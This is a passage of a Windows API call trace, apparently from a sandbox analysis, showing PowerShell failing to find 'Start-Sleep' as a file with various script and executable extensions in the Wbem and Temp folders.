lpFindFileData=0x1b7de420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0176.422] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de7a0) returned 1 [0176.422] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de740) returned 1 [0176.422] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1b7de310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0176.422] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de750) returned 1 [0176.422] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem" (normalized: "c:\\windows\\system32\\wbem"), fInfoLevelId=0x0, lpFileInformation=0x1b7de830 | out: lpFileInformation=0x1b7de830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12d5ce6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x583b237e, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x583b237e, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x14000)) returned 1 [0176.422] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de710) returned 1 [0176.422] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de780) returned 1 [0176.422] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1b7de270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0176.422] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Start-Sleep.psd1", nBufferLength=0x105, lpBuffer=0x1b7de210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem\\Start-Sleep.psd1", lpFilePart=0x0) returned 0x29 [0176.422] GetFullPathNameW (in: lpFileName="Start-Sleep.psd1", nBufferLength=0x105, lpBuffer=0x1b7de210, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.psd1", lpFilePart=0x0) returned 0x35 [0176.422] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.psd1", lpszLongPath=0x1b7de1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0176.422] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b7de160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0176.423] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Start-Sleep.psd1", lpFindFileData=0x1b7de420 | out: lpFindFileData=0x1b7de420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0176.423] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de7a0) returned 1 [0176.424] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de740) returned 1 [0176.424] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1b7de310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0176.424] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de750) returned 1 [0176.424] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem" (normalized: "c:\\windows\\system32\\wbem"), fInfoLevelId=0x0, lpFileInformation=0x1b7de830 | out: lpFileInformation=0x1b7de830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12d5ce6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x583b237e, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x583b237e, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x14000)) returned 1 [0176.424] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de710) returned 1 [0176.424] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de780) returned 1 [0176.424] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1b7de270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0176.424] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Start-Sleep.COM", nBufferLength=0x105, lpBuffer=0x1b7de210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem\\Start-Sleep.COM", lpFilePart=0x0) returned 0x28 [0176.424] GetFullPathNameW (in: lpFileName="Start-Sleep.COM", nBufferLength=0x105, lpBuffer=0x1b7de210, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.COM", lpFilePart=0x0) returned 0x34 [0176.424] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.COM", lpszLongPath=0x1b7de1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0176.424] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b7de160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0176.425] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Start-Sleep.COM", lpFindFileData=0x1b7de420 | out: lpFindFileData=0x1b7de420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0176.425] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de7a0) returned 1 [0176.425] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de740) returned 1 [0176.425] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1b7de310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0176.425] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de750) returned 1 [0176.425] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem" (normalized: "c:\\windows\\system32\\wbem"), fInfoLevelId=0x0, lpFileInformation=0x1b7de830 | out: lpFileInformation=0x1b7de830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12d5ce6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x583b237e, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x583b237e, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x14000)) returned 1 [0176.425] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de710) returned 1 [0176.426] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de780) returned 1 [0176.426] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1b7de270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0176.426] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Start-Sleep.EXE", nBufferLength=0x105, lpBuffer=0x1b7de210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem\\Start-Sleep.EXE", lpFilePart=0x0) returned 0x28 [0176.426] GetFullPathNameW (in: lpFileName="Start-Sleep.EXE", nBufferLength=0x105, lpBuffer=0x1b7de210, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.EXE", lpFilePart=0x0) returned 0x34 [0176.426] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.EXE", lpszLongPath=0x1b7de1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0176.426] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b7de160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0176.427] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Start-Sleep.EXE", lpFindFileData=0x1b7de420 | out: lpFindFileData=0x1b7de420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0176.427] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de7a0) returned 1 [0176.427] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de740) returned 1 [0176.427] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1b7de310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0176.427] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de750) returned 1 [0176.427] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem" (normalized: "c:\\windows\\system32\\wbem"), fInfoLevelId=0x0, lpFileInformation=0x1b7de830 | out: lpFileInformation=0x1b7de830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12d5ce6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x583b237e, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x583b237e, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x14000)) returned 1 [0176.427] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de710) returned 1 [0176.427] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de780) returned 1 [0176.427] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1b7de270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0176.427] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Start-Sleep.BAT", nBufferLength=0x105, lpBuffer=0x1b7de210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem\\Start-Sleep.BAT", lpFilePart=0x0) returned 0x28 [0176.427] GetFullPathNameW (in: lpFileName="Start-Sleep.BAT", nBufferLength=0x105, lpBuffer=0x1b7de210, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.BAT", lpFilePart=0x0) returned 0x34 [0176.427] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.BAT", lpszLongPath=0x1b7de1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0176.427] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b7de160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0176.428] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Start-Sleep.BAT", lpFindFileData=0x1b7de420 | out: lpFindFileData=0x1b7de420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0176.429] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de7a0) returned 1 [0176.429] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de740) returned 1 [0176.429] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1b7de310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0176.429] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de750) returned 1 [0176.429] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem" (normalized: "c:\\windows\\system32\\wbem"), fInfoLevelId=0x0, lpFileInformation=0x1b7de830 | out: lpFileInformation=0x1b7de830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12d5ce6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x583b237e, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x583b237e, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x14000)) returned 1 [0176.429] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de710) returned 1 [0176.429] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de780) returned 1 [0176.429] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1b7de270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0176.429] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Start-Sleep.CMD", nBufferLength=0x105, lpBuffer=0x1b7de210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem\\Start-Sleep.CMD", lpFilePart=0x0) returned 0x28 [0176.429] GetFullPathNameW (in: lpFileName="Start-Sleep.CMD", nBufferLength=0x105, lpBuffer=0x1b7de210, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.CMD", lpFilePart=0x0) returned 0x34 [0176.429] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.CMD", lpszLongPath=0x1b7de1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0176.430] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b7de160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0176.431] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Start-Sleep.CMD", lpFindFileData=0x1b7de420 | out: lpFindFileData=0x1b7de420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0176.431] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de7a0) returned 1 [0176.431] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de740) returned 1 [0176.431] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1b7de310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0176.431] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de750) returned 1 [0176.431] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem" (normalized: "c:\\windows\\system32\\wbem"), fInfoLevelId=0x0, lpFileInformation=0x1b7de830 | out: lpFileInformation=0x1b7de830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12d5ce6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x583b237e, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x583b237e, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x14000)) returned 1 [0176.431] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de710) returned 1 [0176.431] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de780) returned 1 [0176.431] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1b7de270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0176.431] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Start-Sleep.VBS", nBufferLength=0x105, lpBuffer=0x1b7de210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem\\Start-Sleep.VBS", lpFilePart=0x0) returned 0x28 [0176.432] GetFullPathNameW (in: lpFileName="Start-Sleep.VBS", nBufferLength=0x105, lpBuffer=0x1b7de210, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.VBS", lpFilePart=0x0) returned 0x34 [0176.432] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.VBS", lpszLongPath=0x1b7de1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0176.432] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b7de160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0176.433] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Start-Sleep.VBS", lpFindFileData=0x1b7de420 | out: lpFindFileData=0x1b7de420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0176.433] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de7a0) returned 1 [0176.433] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de740) returned 1 [0176.433] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1b7de310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0176.433] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de750) returned 1 [0176.433] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem" (normalized: "c:\\windows\\system32\\wbem"), fInfoLevelId=0x0, lpFileInformation=0x1b7de830 | out: lpFileInformation=0x1b7de830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12d5ce6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x583b237e, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x583b237e, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x14000)) returned 1 [0176.434] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de710) returned 1 [0176.434] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de780) returned 1 [0176.434] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1b7de270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0176.434] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Start-Sleep.VBE", nBufferLength=0x105, lpBuffer=0x1b7de210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem\\Start-Sleep.VBE", lpFilePart=0x0) returned 0x28 [0176.434] GetFullPathNameW (in: lpFileName="Start-Sleep.VBE", nBufferLength=0x105, lpBuffer=0x1b7de210, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.VBE", lpFilePart=0x0) returned 0x34 [0176.434] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.VBE", lpszLongPath=0x1b7de1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0176.434] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b7de160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0176.435] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Start-Sleep.VBE", lpFindFileData=0x1b7de420 | out: lpFindFileData=0x1b7de420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0176.435] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de7a0) returned 1 [0176.435] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de740) returned 1 [0176.435] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1b7de310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0176.435] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de750) returned 1 [0176.435] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem" (normalized: "c:\\windows\\system32\\wbem"), fInfoLevelId=0x0, lpFileInformation=0x1b7de830 | out: lpFileInformation=0x1b7de830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12d5ce6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x583b237e, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x583b237e, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x14000)) returned 1 [0176.435] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de710) returned 1 [0176.435] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de780) returned 1 [0176.435] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1b7de270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0176.436] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Start-Sleep.JS", nBufferLength=0x105, lpBuffer=0x1b7de210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem\\Start-Sleep.JS", lpFilePart=0x0) returned 0x27 [0176.436] GetFullPathNameW (in: lpFileName="Start-Sleep.JS", nBufferLength=0x105, lpBuffer=0x1b7de210, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.JS", lpFilePart=0x0) returned 0x33 [0176.436] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.JS", lpszLongPath=0x1b7de1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0176.436] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b7de160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0176.437] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Start-Sleep.JS", lpFindFileData=0x1b7de420 | out: lpFindFileData=0x1b7de420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0176.437] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de7a0) returned 1 [0176.437] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de740) returned 1 [0176.437] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1b7de310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0176.437] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de750) returned 1 [0176.438] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem" (normalized: "c:\\windows\\system32\\wbem"), fInfoLevelId=0x0, lpFileInformation=0x1b7de830 | out: lpFileInformation=0x1b7de830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12d5ce6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x583b237e, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x583b237e, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x14000)) returned 1 [0176.438] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.JSE", lpszLongPath=0x1b7de1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0176.438] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b7de160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0176.440] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Start-Sleep.JSE", lpFindFileData=0x1b7de420 | out: lpFindFileData=0x1b7de420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0176.440] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de7a0) returned 1 [0176.440] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.WSF", lpszLongPath=0x1b7de1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0176.440] 